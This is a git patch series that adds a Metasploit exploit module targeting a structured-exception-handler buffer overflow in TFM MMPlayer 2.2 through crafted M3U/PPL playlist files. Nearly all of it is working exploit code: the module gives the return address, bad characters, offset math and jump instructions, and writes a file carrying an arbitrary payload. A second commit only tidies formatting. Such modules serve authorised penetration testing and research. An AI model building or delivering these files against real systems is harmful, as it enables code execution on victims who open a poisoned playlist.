From 9756f8751744fbda1016b57a7b8861cb413694ef Mon Sep 17 00:00:00 2001 From: bcoles Date: Wed, 13 Jun 2012 13:50:12 +0930 Subject: [PATCH 1/2] Added TFM MMPlayer (m3u/ppl File) Buffer Overflow module --- .../fileformat/tfm_mmplayer_m3u_ppl_bof.rb | 86 +++++++++++++++++++ 1 file changed, 86 insertions(+) create mode 100644 modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb new file mode 100644 index 0000000000..6e80376095 --- /dev/null +++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb @@ -0,0 +1,86 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow in MMPlayer 2.2 + The vulnerability is triggered when opening a malformed M3U/PPL file + that contains an overly long string. This results in overwriting a + structured exception handler record. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'RjRjh Hack3r', # Original discovery and exploit + 'Brendan Coles ', # msf exploit + ], + 'References' => + [ + [ 'EDB', '18656' ], # .m3u + [ 'EDB', '18657' ], # .ppl + ], + 'DefaultOptions' => + { + 'ExitFunction' => 'seh', + 'InitialAutoRunScript' => 'migrate -f', + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested on: + # Windows XP Pro SP3 - English + # Windows 7 Home Basic SP0 - English + # Windows Server 2003 Enterprise SP2 - English + [ 'Windows Universal', { 'Ret' => 0x00401390 } ], # p/p/r -> MMPlayer.exe + ], + 'Payload' => + { + 'Size' => 4000, + 'BadChars' => "\x00\x0a\x0d", + 'DisableNops' => false, + }, + 'Privileged' => false, + 'DisclosureDate' => '23 Mar 2012', + 'DefaultTarget' => 0 + )) + + register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.ppl']),], self.class) + + end + + def exploit + + nops = make_nops(10) + sc = payload.encoded + offset = Rex::Text.rand_text_alphanumeric(4103 - sc.length - nops.length) + jmp = Rex::Arch::X86.jmp(-4108) # near jump 4103 bytes + nseh = Rex::Arch::X86.jmp_short(-7) # jmp back 7 bytes + nseh << Rex::Text.rand_text_alphanumeric(2) + seh = [target.ret].pack('V') + + sploit = nops + sploit << sc + sploit << offset + sploit << jmp + sploit << nseh + sploit << seh + + # write file + file_create(sploit) + + end +end + From 940f904dee8dfc25fb5f7b443969849131680d6c Mon Sep 17 00:00:00 2001 From: bcoles Date: Thu, 14 Jun 2012 12:10:03 +0930 Subject: [PATCH 2/2] Changed date format to new DisclosureDate format. Removed two redundant spaces. Now passes msftidy. --- .../exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb index 6e80376095..259926933e 100644 --- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb +++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'TFM MMPlayer (m3u/ppl File) Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in MMPlayer 2.2 - The vulnerability is triggered when opening a malformed M3U/PPL file + The vulnerability is triggered when opening a malformed M3U/PPL file that contains an overly long string. This results in overwriting a structured exception handler record. }, @@ -53,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => false, }, 'Privileged' => false, - 'DisclosureDate' => '23 Mar 2012', + 'DisclosureDate' => 'Mar 23 2012', 'DefaultTarget' => 0 )) @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote seh = [target.ret].pack('V') sploit = nops - sploit << sc + sploit << sc sploit << offset sploit << jmp sploit << nseh